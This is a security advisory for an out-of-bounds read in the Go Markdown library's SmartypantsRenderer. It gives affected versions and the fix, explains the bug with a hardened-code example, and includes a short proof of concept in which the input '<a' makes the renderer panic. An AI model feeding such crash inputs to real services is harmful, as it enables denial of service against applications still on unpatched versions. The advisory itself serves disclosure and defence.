7.5
Go Markdown can crash when processing certain text inputs
GHSA-77fj-vx54-gvh7
Summary
A specific type of text input can cause the Go Markdown library to crash or behave unexpectedly. This can affect websites and applications that use Go Markdown to render text. To protect against this, update to the latest version of the library or modify your code to handle this specific scenario.
What to do
- Update github.com/gomarkdown to version 0.0.0-20260411013819-759bbc3e3207.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | gomarkdown | <= 0.0.0-20260411013819-759bbc3e3207 | 0.0.0-20260411013819-759bbc3e3207 |
Original title
Go Markdown has an Out-of-bounds Read in SmartypantsRenderer
Original description
### Summary
Processing, with a SmartypantsRenderer, a malformed input that contains a `<` character not followed by a `>` character anywhere in the remaining text leads to an out-of-bounds read or a panic.
### Details
The `smartLeftAngle()` function in `html/smartypants.go:367-376` performs an out-of-bounds slice operation when processing a `<` character that is not followed by a `>` character anywhere in the remaining text.
https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376
If the length of the slice is lower than its capacity, one extra byte beyond the slice's length is read. If the length equals the capacity, the reslice panics.
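To make the failure mode concrete from a defender's side, the following added example (written for this page, not the gomarkdown project's code) reconstructs the pattern the advisory describes in a hypothetical `unsafeLeftAngle`: scan forward for `>` and reslice past the scan index. With `cap > len` the reslice silently exposes a stale byte from the backing array; with `cap == len` it panics. `safeLeftAngle` is the hardened form that bounds the reslice by the search result, and `renderGuarded` shows the service-level containment a renderer caller can apply so one malformed document cannot take down the process. All inputs are constructed inline.

```go
package main

import (
	"bytes"
	"fmt"
)

// unsafeLeftAngle is a hypothetical reconstruction of the buggy pattern the
// advisory describes (not the library's actual code): scan for '>' and
// reslice through it. When no '>' exists, i == len(text) and text[:i+1]
// reads one byte past the logical end (cap > len) or panics (cap == len).
func unsafeLeftAngle(text []byte) []byte {
	i := 0
	for i < len(text) && text[i] != '>' {
		i++
	}
	return text[:i+1]
}

// safeLeftAngle is the hardened form: the reslice is bounded by the result of
// the search, and a missing '>' degrades to emitting the lone '<' literally.
// It assumes, like the original, that text begins at the '<'.
func safeLeftAngle(text []byte) []byte {
	if len(text) == 0 {
		return text
	}
	if idx := bytes.IndexByte(text, '>'); idx >= 0 {
		return text[:idx+1]
	}
	return text[:1] // no closing '>': nothing to pair, keep just the '<'
}

// renderGuarded contains a renderer panic at the call boundary so that a
// single malformed document is reported as an error instead of crashing the
// whole service. Use this in addition to, not instead of, upgrading.
func renderGuarded(render func([]byte) []byte, input []byte) (out []byte, err error) {
	defer func() {
		if r := recover(); r != nil {
			out = nil
			err = fmt.Errorf("renderer panicked on input %q: %v", input, r)
		}
	}()
	return render(input), nil
}

func main() {
	// Constructed input: backing array longer than the slice, so the stale
	// byte 'X' beyond len is reachable through the buggy reslice.
	backing := []byte("<aX")
	src := backing[:2] // len=2, cap=3
	fmt.Printf("buggy, cap>len:  %q (leaks a byte past len)\n", unsafeLeftAngle(src))
	fmt.Printf("safe:            %q\n", safeLeftAngle(src))

	// Constructed input with len == cap: the buggy reslice panics, which the
	// guard turns into an error.
	exact := make([]byte, 2)
	copy(exact, "<a")
	if _, err := renderGuarded(unsafeLeftAngle, exact); err != nil {
		fmt.Println("buggy, cap==len:", err)
	}
}
```

The recover wrapper is a mitigation for availability only; the out-of-bounds read in the `cap > len` case produces no panic to recover, which is why the version update remains the actual fix.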
### PoC
```golang
package main

import (
	"bytes"
	"fmt"

	"github.com/gomarkdown/markdown/html"
)

func main() {
	// A '<' with no '>' anywhere after it: the trigger described above.
	src := []byte("<a")
	fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src))

	var buf bytes.Buffer
	sp := html.NewSmartypantsRenderer(html.Smartypants)
	sp.Process(&buf, src) // panics: slice bounds out of range
	fmt.Printf("Output: %q\n", buf.String())
}
```
### Impact
This vulnerability will lead to a Denial of Service / panic on the processing service.
-- The Datadog Security Team
CVSS 3.1 (GHSA): 7.5
Vulnerability type
CWE-125
Out-of-bounds Read
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026